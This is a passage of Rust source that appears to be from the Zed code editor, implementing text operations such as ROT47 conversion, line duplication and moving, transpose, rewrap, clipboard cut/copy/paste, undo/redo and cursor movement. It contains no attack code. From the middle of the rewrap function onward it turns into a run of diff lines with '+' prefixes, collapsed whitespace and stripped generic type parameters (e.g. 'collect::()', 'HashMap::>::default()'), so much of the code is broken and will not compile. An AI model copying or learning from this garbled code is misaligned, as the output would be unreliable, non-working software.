                    'N'..='Z' | 'n'..='z' => ((c as u8) - 13) as char,
                    _ => c,
                })
                .collect()
        })
    }

    /// Apply the ROT47 cipher to printable ASCII (code points 33..=126).
    pub fn convert_to_rot47(
        &mut self,
        _: &ConvertToRot47,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.manipulate_text(window, cx, |text| {
            text.chars()
                .map(|c| {
                    let code_point = c as u32;
                    if code_point >= 33 && code_point <= 126 {
                        return char::from_u32(33 + ((code_point + 14) % 94)).unwrap();
                    }
                    c
                })
                .collect()
        })
    }

    /// Replace each selection (or the word under an empty selection) with
    /// `callback(text)`, adjusting subsequent selections for length changes.
    fn manipulate_text<Fn>(&mut self, window: &mut Window, cx: &mut Context<Self>, mut callback: Fn)
    where
        Fn: FnMut(&str) -> String,
    {
        let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx));
        let buffer = self.buffer.read(cx).snapshot(cx);

        let mut new_selections = Vec::new();
        let mut edits = Vec::new();
        let mut selection_adjustment = 0i32;

        for selection in self.selections.all::<usize>(cx) {
            let selection_is_empty = selection.is_empty();

            let (start, end) = if selection_is_empty {
                // Empty selection: operate on the surrounding word.
                let word_range = movement::surrounding_word(
                    &display_map,
                    selection.start.to_display_point(&display_map),
                );
                let start = word_range.start.to_offset(&display_map, Bias::Left);
                let end = word_range.end.to_offset(&display_map, Bias::Left);
                (start, end)
            } else {
                (selection.start, selection.end)
            };

            let text = buffer.text_for_range(start..end).collect::<String>();
            let old_length = text.len() as i32;
            let text = callback(&text);

            new_selections.push(Selection {
                start: (start as i32 - selection_adjustment) as usize,
                end: ((start + text.len()) as i32 - selection_adjustment) as usize,
                goal: SelectionGoal::None,
                ..selection
            });

            selection_adjustment += old_length - text.len() as i32;

            edits.push((start..end, text));
        }

        self.transact(window, cx, |this, window, cx| {
            this.buffer.update(cx, |buffer, cx| {
                buffer.edit(edits, None, cx);
            });

            this.change_selections(Some(Autoscroll::fit()), window, cx, |s| {
                s.select(new_selections);
            });

            this.request_autoscroll(Autoscroll::fit(), cx);
        });
    }

    /// Duplicate the selected lines (when `whole_lines` or the selection is a
    /// cursor) or the selected character range, above or below per `upwards`.
    pub fn duplicate(
        &mut self,
        upwards: bool,
        whole_lines: bool,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction);

        let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx));
        let buffer = &display_map.buffer_snapshot;
        let selections = self.selections.all::<Point>(cx);

        let mut edits = Vec::new();
        let mut selections_iter = selections.iter().peekable();
        while let Some(selection) = selections_iter.next() {
            let mut rows = selection.spanned_rows(false, &display_map);
            // duplicate line-wise
            if whole_lines || selection.start == selection.end {
                // Avoid duplicating the same lines twice.
                while let Some(next_selection) = selections_iter.peek() {
                    let next_rows = next_selection.spanned_rows(false, &display_map);
                    if next_rows.start < rows.end {
                        rows.end = next_rows.end;
                        selections_iter.next().unwrap();
                    } else {
                        break;
                    }
                }

                // Copy the text from the selected row region and splice it either at the start
                // or end of the region.
// NOTE(review): reconstructed from a whitespace-mangled diff. Stripped generic
// parameters (`all::<Point>`, `all::<usize>`, `Vec<(Range<usize>, String)>`,
// `Context<Self>`, `Range<MultiBufferRow>`) restored from surrounding usage.
//
// Tail of `duplicate`: splice the copied rows above or below the region, or
// duplicate the raw character range for non-line-wise selections.
                let start = Point::new(rows.start.0, 0);
                let end = Point::new(
                    rows.end.previous_row().0,
                    buffer.line_len(rows.end.previous_row()),
                );
                let text = buffer
                    .text_for_range(start..end)
                    .chain(Some("\n"))
                    .collect::<String>();
                let insert_location = if upwards {
                    Point::new(rows.end.0, 0)
                } else {
                    start
                };
                edits.push((insert_location..insert_location, text));
            } else {
                // duplicate character-wise
                let start = selection.start;
                let end = selection.end;
                let text = buffer.text_for_range(start..end).collect::<String>();
                edits.push((selection.end..selection.end, text));
            }
        }

        self.transact(window, cx, |this, _, cx| {
            this.buffer.update(cx, |buffer, cx| {
                buffer.edit(edits, None, cx);
            });

            this.request_autoscroll(Autoscroll::fit(), cx);
        });
    }

    /// Duplicate the selected lines, placing the copy above.
    pub fn duplicate_line_up(
        &mut self,
        _: &DuplicateLineUp,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.duplicate(true, true, window, cx);
    }

    /// Duplicate the selected lines, placing the copy below.
    pub fn duplicate_line_down(
        &mut self,
        _: &DuplicateLineDown,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.duplicate(false, true, window, cx);
    }

    /// Duplicate the exact selected character range in place.
    pub fn duplicate_selection(
        &mut self,
        _: &DuplicateSelection,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.duplicate(false, false, window, cx);
    }

    /// Move the lines spanned by each selection up by one line, carrying
    /// selections and folds along; lines never cross excerpt boundaries.
    pub fn move_line_up(&mut self, _: &MoveLineUp, window: &mut Window, cx: &mut Context<Self>) {
        self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction);

        let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx));
        let buffer = self.buffer.read(cx).snapshot(cx);

        let mut edits = Vec::new();
        let mut unfold_ranges = Vec::new();
        let mut refold_creases = Vec::new();

        let selections = self.selections.all::<Point>(cx);
        let mut selections = selections.iter().peekable();
        let mut contiguous_row_selections = Vec::new();
        let mut new_selections = Vec::new();

        while let Some(selection) = selections.next() {
            // Find all the selections that span a contiguous row range
            let (start_row, end_row) = consume_contiguous_rows(
                &mut contiguous_row_selections,
                selection,
                &display_map,
                &mut selections,
            );

            // Move the text spanned by the row range to be before the line preceding the row range
            if start_row.0 > 0 {
                let range_to_move = Point::new(
                    start_row.previous_row().0,
                    buffer.line_len(start_row.previous_row()),
                )
                    ..Point::new(
                        end_row.previous_row().0,
                        buffer.line_len(end_row.previous_row()),
                    );
                let insertion_point = display_map
                    .prev_line_boundary(Point::new(start_row.previous_row().0, 0))
                    .0;

                // Don't move lines across excerpts
                if buffer
                    .excerpt_containing(insertion_point..range_to_move.end)
                    .is_some()
                {
                    let text = buffer
                        .text_for_range(range_to_move.clone())
                        .flat_map(|s| s.chars())
                        .skip(1)
                        .chain(['\n'])
                        .collect::<String>();

                    edits.push((
                        buffer.anchor_after(range_to_move.start)
                            ..buffer.anchor_before(range_to_move.end),
                        String::new(),
                    ));
                    let insertion_anchor = buffer.anchor_after(insertion_point);
                    edits.push((insertion_anchor..insertion_anchor, text));

                    let row_delta = range_to_move.start.row - insertion_point.row + 1;

                    // Move selections up
                    new_selections.extend(contiguous_row_selections.drain(..).map(
                        |mut selection| {
                            selection.start.row -= row_delta;
                            selection.end.row -= row_delta;
                            selection
                        },
                    ));

                    // Move folds up
                    unfold_ranges.push(range_to_move.clone());
                    for fold in display_map.folds_in_range(
                        buffer.anchor_before(range_to_move.start)
                            ..buffer.anchor_after(range_to_move.end),
                    ) {
                        let mut start = fold.range.start.to_point(&buffer);
                        let mut end = fold.range.end.to_point(&buffer);
                        start.row -= row_delta;
                        end.row -= row_delta;
                        refold_creases.push(Crease::simple(start..end, fold.placeholder.clone()));
                    }
                }
            }

            // If we didn't move line(s), preserve the existing selections
            new_selections.append(&mut contiguous_row_selections);
        }

        self.transact(window, cx, |this, window, cx| {
            this.unfold_ranges(&unfold_ranges, true, true, cx);
            this.buffer.update(cx, |buffer, cx| {
                for (range, text) in edits {
                    buffer.edit([(range, text)], None, cx);
                }
            });
            this.fold_creases(refold_creases, true, window, cx);
            this.change_selections(Some(Autoscroll::fit()), window, cx, |s| {
                s.select(new_selections);
            })
        });
    }

    /// Move the lines spanned by each selection down by one line, carrying
    /// selections and folds along; lines never cross excerpt boundaries.
    pub fn move_line_down(
        &mut self,
        _: &MoveLineDown,
        window: &mut Window,
        cx: &mut Context<Self>,
    ) {
        self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction);

        let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx));
        let buffer = self.buffer.read(cx).snapshot(cx);

        let mut edits = Vec::new();
        let mut unfold_ranges = Vec::new();
        let mut refold_creases = Vec::new();

        let selections = self.selections.all::<Point>(cx);
        let mut selections = selections.iter().peekable();
        let mut contiguous_row_selections = Vec::new();
        let mut new_selections = Vec::new();

        while let Some(selection) = selections.next() {
            // Find all the selections that span a contiguous row range
            let (start_row, end_row) = consume_contiguous_rows(
                &mut contiguous_row_selections,
                selection,
                &display_map,
                &mut selections,
            );

            // Move the text spanned by the row range to be after the last line of the row range
            if end_row.0 <= buffer.max_point().row {
                let range_to_move =
                    MultiBufferPoint::new(start_row.0, 0)..MultiBufferPoint::new(end_row.0, 0);
                let insertion_point = display_map
                    .next_line_boundary(MultiBufferPoint::new(end_row.0, 0))
                    .0;

                // Don't move lines across excerpt boundaries
                if buffer
                    .excerpt_containing(range_to_move.start..insertion_point)
                    .is_some()
                {
                    let mut text = String::from("\n");
                    text.extend(buffer.text_for_range(range_to_move.clone()));
                    text.pop(); // Drop trailing newline
                    edits.push((
                        buffer.anchor_after(range_to_move.start)
                            ..buffer.anchor_before(range_to_move.end),
                        String::new(),
                    ));
                    let insertion_anchor = buffer.anchor_after(insertion_point);
                    edits.push((insertion_anchor..insertion_anchor, text));

                    let row_delta = insertion_point.row - range_to_move.end.row + 1;

                    // Move selections down
                    new_selections.extend(contiguous_row_selections.drain(..).map(
                        |mut selection| {
                            selection.start.row += row_delta;
                            selection.end.row += row_delta;
                            selection
                        },
                    ));

                    // Move folds down
                    unfold_ranges.push(range_to_move.clone());
                    for fold in display_map.folds_in_range(
                        buffer.anchor_before(range_to_move.start)
                            ..buffer.anchor_after(range_to_move.end),
                    ) {
                        let mut start = fold.range.start.to_point(&buffer);
                        let mut end = fold.range.end.to_point(&buffer);
                        start.row += row_delta;
                        end.row += row_delta;
                        refold_creases.push(Crease::simple(start..end, fold.placeholder.clone()));
                    }
                }
            }

            // If we didn't move line(s), preserve the existing selections
            new_selections.append(&mut contiguous_row_selections);
        }

        self.transact(window, cx, |this, window, cx| {
            this.unfold_ranges(&unfold_ranges, true, true, cx);
            this.buffer.update(cx, |buffer, cx| {
                for (range, text) in edits {
                    buffer.edit([(range, text)], None, cx);
                }
            });
            this.fold_creases(refold_creases, true, window, cx);
            this.change_selections(Some(Autoscroll::fit()), window, cx, |s| {
                s.select(new_selections)
            });
        });
    }

    /// Swap the character before each empty cursor with the one under it,
    /// advancing the cursor (classic Emacs-style transpose).
    pub fn transpose(&mut self, _: &Transpose, window: &mut Window, cx: &mut Context<Self>) {
        self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction);
        let text_layout_details = &self.text_layout_details(window);
        self.transact(window, cx, |this, window, cx| {
            let edits = this.change_selections(Some(Autoscroll::fit()), window, cx, |s| {
                let mut edits: Vec<(Range<usize>, String)> = Default::default();
                s.move_with(|display_map, selection| {
                    if !selection.is_empty() {
                        return;
                    }

                    let mut head = selection.head();
                    let mut transpose_offset = head.to_offset(display_map, Bias::Right);
                    // At end of line, transpose the two characters before the cursor.
                    if head.column() == display_map.line_len(head.row()) {
                        transpose_offset = display_map
                            .buffer_snapshot
                            .clip_offset(transpose_offset.saturating_sub(1), Bias::Left);
                    }

                    if transpose_offset == 0 {
                        return;
                    }

                    *head.column_mut() += 1;
                    head = display_map.clip_point(head, Bias::Right);
                    let goal = SelectionGoal::HorizontalPosition(
                        display_map
                            .x_for_display_point(head, text_layout_details)
                            .into(),
                    );
                    selection.collapse_to(head, goal);

                    let transpose_start = display_map
                        .buffer_snapshot
                        .clip_offset(transpose_offset.saturating_sub(1), Bias::Left);
                    // Skip if this edit would overlap the previous cursor's edit.
                    if edits.last().map_or(true, |e| e.0.end <= transpose_start) {
                        let transpose_end = display_map
                            .buffer_snapshot
                            .clip_offset(transpose_offset + 1, Bias::Right);
                        if let Some(ch) =
                            display_map.buffer_snapshot.chars_at(transpose_start).next()
                        {
                            edits.push((transpose_start..transpose_offset, String::new()));
                            edits.push((transpose_end..transpose_end, ch.to_string()));
                        }
                    }
                });
                edits
            });
            this.buffer
                .update(cx, |buffer, cx| buffer.edit(edits, None, cx));
            let selections = this.selections.all::<usize>(cx);
            this.change_selections(Some(Autoscroll::fit()), window, cx, |s| {
                s.select(selections);
            });
        });
    }

    /// Re-wrap the selected text to the configured line width.
    pub fn rewrap(&mut self, _: &Rewrap, _: &mut Window, cx: &mut Context<Self>) {
        self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction);
        self.rewrap_impl(RewrapOptions::default(), cx)
    }

    // Head of `rewrap_impl` (body continues beyond this chunk).
    pub fn rewrap_impl(&mut self, options: RewrapOptions, cx: &mut Context<Self>) {
        let buffer = self.buffer.read(cx).snapshot(cx);
        let selections = self.selections.all::<Point>(cx);
        let mut selections = selections.iter().peekable();

        let mut edits = Vec::new();
        let mut rewrapped_row_ranges = Vec::<Range<MultiBufferRow>>::new();

        while let Some(selection) = selections.next() {
            let mut start_row = selection.start.row;
            let mut end_row = selection.end.row;

            // Skip selections that overlap with a range that has already been rewrapped.
+ let selection_range = start_row..end_row; + if rewrapped_row_ranges + .iter() + .any(|range| range.overlaps(&selection_range)) + { + continue; + } + + let tab_size = buffer.language_settings_at(selection.head(), cx).tab_size; + + // Since not all lines in the selection may be at the same indent + // level, choose the indent size that is the most common between all + // of the lines. + // + // If there is a tie, we use the deepest indent. + let (indent_size, indent_end) = { + let mut indent_size_occurrences = HashMap::default(); + let mut rows_by_indent_size = HashMap::>::default(); + + for row in start_row..=end_row { + let indent = buffer.indent_size_for_line(MultiBufferRow(row)); + rows_by_indent_size.entry(indent).or_default().push(row); + *indent_size_occurrences.entry(indent).or_insert(0) += 1; + } + + let indent_size = indent_size_occurrences + .into_iter() + .max_by_key(|(indent, count)| (*count, indent.len_with_expanded_tabs(tab_size))) + .map(|(indent, _)| indent) + .unwrap_or_default(); + let row = rows_by_indent_size[&indent_size][0]; + let indent_end = Point::new(row, indent_size.len); + + (indent_size, indent_end) + }; + + let mut line_prefix = indent_size.chars().collect::(); + + let mut inside_comment = false; + if let Some(comment_prefix) = + buffer + .language_scope_at(selection.head()) + .and_then(|language| { + language + .line_comment_prefixes() + .iter() + .find(|prefix| buffer.contains_str_at(indent_end, prefix)) + .cloned() + }) + { + line_prefix.push_str(&comment_prefix); + inside_comment = true; + } + + let language_settings = buffer.language_settings_at(selection.head(), cx); + let allow_rewrap_based_on_language = match language_settings.allow_rewrap { + RewrapBehavior::InComments => inside_comment, + RewrapBehavior::InSelections => !selection.is_empty(), + RewrapBehavior::Anywhere => true, + }; + + let should_rewrap = options.override_language_settings + || allow_rewrap_based_on_language + || self.hard_wrap.is_some(); + if 
!should_rewrap { + continue; + } + + if selection.is_empty() { + 'expand_upwards: while start_row > 0 { + let prev_row = start_row - 1; + if buffer.contains_str_at(Point::new(prev_row, 0), &line_prefix) + && buffer.line_len(MultiBufferRow(prev_row)) as usize > line_prefix.len() + { + start_row = prev_row; + } else { + break 'expand_upwards; + } + } + + 'expand_downwards: while end_row < buffer.max_point().row { + let next_row = end_row + 1; + if buffer.contains_str_at(Point::new(next_row, 0), &line_prefix) + && buffer.line_len(MultiBufferRow(next_row)) as usize > line_prefix.len() + { + end_row = next_row; + } else { + break 'expand_downwards; + } + } + } + + let start = Point::new(start_row, 0); + let start_offset = start.to_offset(&buffer); + let end = Point::new(end_row, buffer.line_len(MultiBufferRow(end_row))); + let selection_text = buffer.text_for_range(start..end).collect::(); + let Some(lines_without_prefixes) = selection_text + .lines() + .map(|line| { + line.strip_prefix(&line_prefix) + .or_else(|| line.trim_start().strip_prefix(&line_prefix.trim_start())) + .with_context(|| { + format!("line did not start with prefix {line_prefix:?}: {line:?}") + }) + }) + .collect::, _>>() + .log_err() + else { + continue; + }; + + let wrap_column = self.hard_wrap.unwrap_or_else(|| { + buffer + .language_settings_at(Point::new(start_row, 0), cx) + .preferred_line_length as usize + }); + let wrapped_text = wrap_with_prefix( + line_prefix, + lines_without_prefixes.join("\n"), + wrap_column, + tab_size, + options.preserve_existing_whitespace, + ); + + // TODO: should always use char-based diff while still supporting cursor behavior that + // matches vim. 
+ let mut diff_options = DiffOptions::default(); + if options.override_language_settings { + diff_options.max_word_diff_len = 0; + diff_options.max_word_diff_line_count = 0; + } else { + diff_options.max_word_diff_len = usize::MAX; + diff_options.max_word_diff_line_count = usize::MAX; + } + + for (old_range, new_text) in + text_diff_with_options(&selection_text, &wrapped_text, diff_options) + { + let edit_start = buffer.anchor_after(start_offset + old_range.start); + let edit_end = buffer.anchor_after(start_offset + old_range.end); + edits.push((edit_start..edit_end, new_text)); + } + + rewrapped_row_ranges.push(start_row..=end_row); + } + + self.buffer + .update(cx, |buffer, cx| buffer.edit(edits, None, cx)); + } + + pub fn cut_common(&mut self, window: &mut Window, cx: &mut Context) -> ClipboardItem { + let mut text = String::new(); + let buffer = self.buffer.read(cx).snapshot(cx); + let mut selections = self.selections.all::(cx); + let mut clipboard_selections = Vec::with_capacity(selections.len()); + { + let max_point = buffer.max_point(); + let mut is_first = true; + for selection in &mut selections { + let is_entire_line = selection.is_empty() || self.selections.line_mode; + if is_entire_line { + selection.start = Point::new(selection.start.row, 0); + if !selection.is_empty() && selection.end.column == 0 { + selection.end = cmp::min(max_point, selection.end); + } else { + selection.end = cmp::min(max_point, Point::new(selection.end.row + 1, 0)); + } + selection.goal = SelectionGoal::None; + } + if is_first { + is_first = false; + } else { + text += "\n"; + } + let mut len = 0; + for chunk in buffer.text_for_range(selection.start..selection.end) { + text.push_str(chunk); + len += chunk.len(); + } + clipboard_selections.push(ClipboardSelection { + len, + is_entire_line, + first_line_indent: buffer + .indent_size_for_line(MultiBufferRow(selection.start.row)) + .len, + }); + } + } + + self.transact(window, cx, |this, window, cx| { + 
this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(selections); + }); + this.insert("", window, cx); + }); + ClipboardItem::new_string_with_json_metadata(text, clipboard_selections) + } + + pub fn cut(&mut self, _: &Cut, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let item = self.cut_common(window, cx); + cx.write_to_clipboard(item); + } + + pub fn kill_ring_cut(&mut self, _: &KillRingCut, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.change_selections(None, window, cx, |s| { + s.move_with(|snapshot, sel| { + if sel.is_empty() { + sel.end = DisplayPoint::new(sel.end.row(), snapshot.line_len(sel.end.row())) + } + }); + }); + let item = self.cut_common(window, cx); + cx.set_global(KillRing(item)) + } + + pub fn kill_ring_yank( + &mut self, + _: &KillRingYank, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let (text, metadata) = if let Some(KillRing(item)) = cx.try_global() { + if let Some(ClipboardEntry::String(kill_ring)) = item.entries().first() { + (kill_ring.text().to_string(), kill_ring.metadata_json()) + } else { + return; + } + } else { + return; + }; + self.do_paste(&text, metadata, false, window, cx); + } + + pub fn copy_and_trim(&mut self, _: &CopyAndTrim, _: &mut Window, cx: &mut Context) { + self.do_copy(true, cx); + } + + pub fn copy(&mut self, _: &Copy, _: &mut Window, cx: &mut Context) { + self.do_copy(false, cx); + } + + fn do_copy(&self, strip_leading_indents: bool, cx: &mut Context) { + let selections = self.selections.all::(cx); + let buffer = self.buffer.read(cx).read(cx); + let mut text = String::new(); + + let mut clipboard_selections = Vec::with_capacity(selections.len()); + { + let max_point = buffer.max_point(); + let mut is_first = true; + for selection in &selections { + let mut start = selection.start; + let mut end = 
selection.end; + let is_entire_line = selection.is_empty() || self.selections.line_mode; + if is_entire_line { + start = Point::new(start.row, 0); + end = cmp::min(max_point, Point::new(end.row + 1, 0)); + } + + let mut trimmed_selections = Vec::new(); + if strip_leading_indents && end.row.saturating_sub(start.row) > 0 { + let row = MultiBufferRow(start.row); + let first_indent = buffer.indent_size_for_line(row); + if first_indent.len == 0 || start.column > first_indent.len { + trimmed_selections.push(start..end); + } else { + trimmed_selections.push( + Point::new(row.0, first_indent.len) + ..Point::new(row.0, buffer.line_len(row)), + ); + for row in start.row + 1..=end.row { + let mut line_len = buffer.line_len(MultiBufferRow(row)); + if row == end.row { + line_len = end.column; + } + if line_len == 0 { + trimmed_selections + .push(Point::new(row, 0)..Point::new(row, line_len)); + continue; + } + let row_indent_size = buffer.indent_size_for_line(MultiBufferRow(row)); + if row_indent_size.len >= first_indent.len { + trimmed_selections.push( + Point::new(row, first_indent.len)..Point::new(row, line_len), + ); + } else { + trimmed_selections.clear(); + trimmed_selections.push(start..end); + break; + } + } + } + } else { + trimmed_selections.push(start..end); + } + + for trimmed_range in trimmed_selections { + if is_first { + is_first = false; + } else { + text += "\n"; + } + let mut len = 0; + for chunk in buffer.text_for_range(trimmed_range.start..trimmed_range.end) { + text.push_str(chunk); + len += chunk.len(); + } + clipboard_selections.push(ClipboardSelection { + len, + is_entire_line, + first_line_indent: buffer + .indent_size_for_line(MultiBufferRow(trimmed_range.start.row)) + .len, + }); + } + } + } + + cx.write_to_clipboard(ClipboardItem::new_string_with_json_metadata( + text, + clipboard_selections, + )); + } + + pub fn do_paste( + &mut self, + text: &String, + clipboard_selections: Option>, + handle_entire_lines: bool, + window: &mut Window, + cx: &mut 
Context, + ) { + if self.read_only(cx) { + return; + } + + let clipboard_text = Cow::Borrowed(text); + + self.transact(window, cx, |this, window, cx| { + if let Some(mut clipboard_selections) = clipboard_selections { + let old_selections = this.selections.all::(cx); + let all_selections_were_entire_line = + clipboard_selections.iter().all(|s| s.is_entire_line); + let first_selection_indent_column = + clipboard_selections.first().map(|s| s.first_line_indent); + if clipboard_selections.len() != old_selections.len() { + clipboard_selections.drain(..); + } + let cursor_offset = this.selections.last::(cx).head(); + let mut auto_indent_on_paste = true; + + this.buffer.update(cx, |buffer, cx| { + let snapshot = buffer.read(cx); + auto_indent_on_paste = snapshot + .language_settings_at(cursor_offset, cx) + .auto_indent_on_paste; + + let mut start_offset = 0; + let mut edits = Vec::new(); + let mut original_indent_columns = Vec::new(); + for (ix, selection) in old_selections.iter().enumerate() { + let to_insert; + let entire_line; + let original_indent_column; + if let Some(clipboard_selection) = clipboard_selections.get(ix) { + let end_offset = start_offset + clipboard_selection.len; + to_insert = &clipboard_text[start_offset..end_offset]; + entire_line = clipboard_selection.is_entire_line; + start_offset = end_offset + 1; + original_indent_column = Some(clipboard_selection.first_line_indent); + } else { + to_insert = clipboard_text.as_str(); + entire_line = all_selections_were_entire_line; + original_indent_column = first_selection_indent_column + } + + // If the corresponding selection was empty when this slice of the + // clipboard text was written, then the entire line containing the + // selection was copied. If this selection is also currently empty, + // then paste the line before the current line of the buffer. 
+ let range = if selection.is_empty() && handle_entire_lines && entire_line { + let column = selection.start.to_point(&snapshot).column as usize; + let line_start = selection.start - column; + line_start..line_start + } else { + selection.range() + }; + + edits.push((range, to_insert)); + original_indent_columns.push(original_indent_column); + } + drop(snapshot); + + buffer.edit( + edits, + if auto_indent_on_paste { + Some(AutoindentMode::Block { + original_indent_columns, + }) + } else { + None + }, + cx, + ); + }); + + let selections = this.selections.all::(cx); + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(selections) + }); + } else { + this.insert(&clipboard_text, window, cx); + } + }); + } + + pub fn paste(&mut self, _: &Paste, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + if let Some(item) = cx.read_from_clipboard() { + let entries = item.entries(); + + match entries.first() { + // For now, we only support applying metadata if there's one string. In the future, we can incorporate all the selections + // of all the pasted entries. + Some(ClipboardEntry::String(clipboard_string)) if entries.len() == 1 => self + .do_paste( + clipboard_string.text(), + clipboard_string.metadata_json::>(), + true, + window, + cx, + ), + _ => self.do_paste(&item.text().unwrap_or_default(), None, true, window, cx), + } + } + } + + pub fn undo(&mut self, _: &Undo, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } + + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + if let Some(transaction_id) = self.buffer.update(cx, |buffer, cx| buffer.undo(cx)) { + if let Some((selections, _)) = + self.selection_history.transaction(transaction_id).cloned() + { + self.change_selections(None, window, cx, |s| { + s.select_anchors(selections.to_vec()); + }); + } else { + log::error!( + "No entry in selection_history found for undo. 
\ + This may correspond to a bug where undo does not update the selection. \ + If this is occurring, please add details to \ + https://github.com/zed-industries/zed/issues/22692" + ); + } + self.request_autoscroll(Autoscroll::fit(), cx); + self.unmark_text(window, cx); + self.refresh_inline_completion(true, false, window, cx); + cx.emit(EditorEvent::Edited { transaction_id }); + cx.emit(EditorEvent::TransactionUndone { transaction_id }); + } + } + + pub fn redo(&mut self, _: &Redo, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } + + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + if let Some(transaction_id) = self.buffer.update(cx, |buffer, cx| buffer.redo(cx)) { + if let Some((_, Some(selections))) = + self.selection_history.transaction(transaction_id).cloned() + { + self.change_selections(None, window, cx, |s| { + s.select_anchors(selections.to_vec()); + }); + } else { + log::error!( + "No entry in selection_history found for redo. \ + This may correspond to a bug where undo does not update the selection. 
\ + If this is occurring, please add details to \ + https://github.com/zed-industries/zed/issues/22692" + ); + } + self.request_autoscroll(Autoscroll::fit(), cx); + self.unmark_text(window, cx); + self.refresh_inline_completion(true, false, window, cx); + cx.emit(EditorEvent::Edited { transaction_id }); + } + } + + pub fn finalize_last_transaction(&mut self, cx: &mut Context) { + self.buffer + .update(cx, |buffer, cx| buffer.finalize_last_transaction(cx)); + } + + pub fn group_until_transaction(&mut self, tx_id: TransactionId, cx: &mut Context) { + self.buffer + .update(cx, |buffer, cx| buffer.group_until_transaction(tx_id, cx)); + } + + pub fn move_left(&mut self, _: &MoveLeft, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + let cursor = if selection.is_empty() { + movement::left(map, selection.start) + } else { + selection.start + }; + selection.collapse_to(cursor, SelectionGoal::None); + }); + }) + } + + pub fn select_left(&mut self, _: &SelectLeft, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| (movement::left(map, head), SelectionGoal::None)); + }) + } + + pub fn move_right(&mut self, _: &MoveRight, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + let cursor = if selection.is_empty() { + movement::right(map, selection.end) + } else { + selection.end + }; + selection.collapse_to(cursor, SelectionGoal::None) + }); + }) + } + + pub fn select_right(&mut self, _: &SelectRight, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + 
self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| (movement::right(map, head), SelectionGoal::None)); + }) + } + + pub fn move_up(&mut self, _: &MoveUp, window: &mut Window, cx: &mut Context) { + if self.take_rename(true, window, cx).is_some() { + return; + } + + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let text_layout_details = &self.text_layout_details(window); + let selection_count = self.selections.count(); + let first_selection = self.selections.first_anchor(); + + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + if !selection.is_empty() { + selection.goal = SelectionGoal::None; + } + let (cursor, goal) = movement::up( + map, + selection.start, + selection.goal, + false, + text_layout_details, + ); + selection.collapse_to(cursor, goal); + }); + }); + + if selection_count == 1 && first_selection.range() == self.selections.first_anchor().range() + { + cx.propagate(); + } + } + + pub fn move_up_by_lines( + &mut self, + action: &MoveUpByLines, + window: &mut Window, + cx: &mut Context, + ) { + if self.take_rename(true, window, cx).is_some() { + return; + } + + if matches!(self.mode, EditorMode::SingleLine { .. 
}) { + cx.propagate(); + return; + } + + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let text_layout_details = &self.text_layout_details(window); + + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + if !selection.is_empty() { + selection.goal = SelectionGoal::None; + } + let (cursor, goal) = movement::up_by_rows( + map, + selection.start, + action.lines, + selection.goal, + false, + text_layout_details, + ); + selection.collapse_to(cursor, goal); + }); + }) + } + + pub fn move_down_by_lines( + &mut self, + action: &MoveDownByLines, + window: &mut Window, + cx: &mut Context, + ) { + if self.take_rename(true, window, cx).is_some() { + return; + } + + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let text_layout_details = &self.text_layout_details(window); + + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + if !selection.is_empty() { + selection.goal = SelectionGoal::None; + } + let (cursor, goal) = movement::down_by_rows( + map, + selection.start, + action.lines, + selection.goal, + false, + text_layout_details, + ); + selection.collapse_to(cursor, goal); + }); + }) + } + + pub fn select_down_by_lines( + &mut self, + action: &SelectDownByLines, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let text_layout_details = &self.text_layout_details(window); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, goal| { + movement::down_by_rows(map, head, action.lines, goal, false, text_layout_details) + }) + }) + } + + pub fn select_up_by_lines( + &mut self, + action: 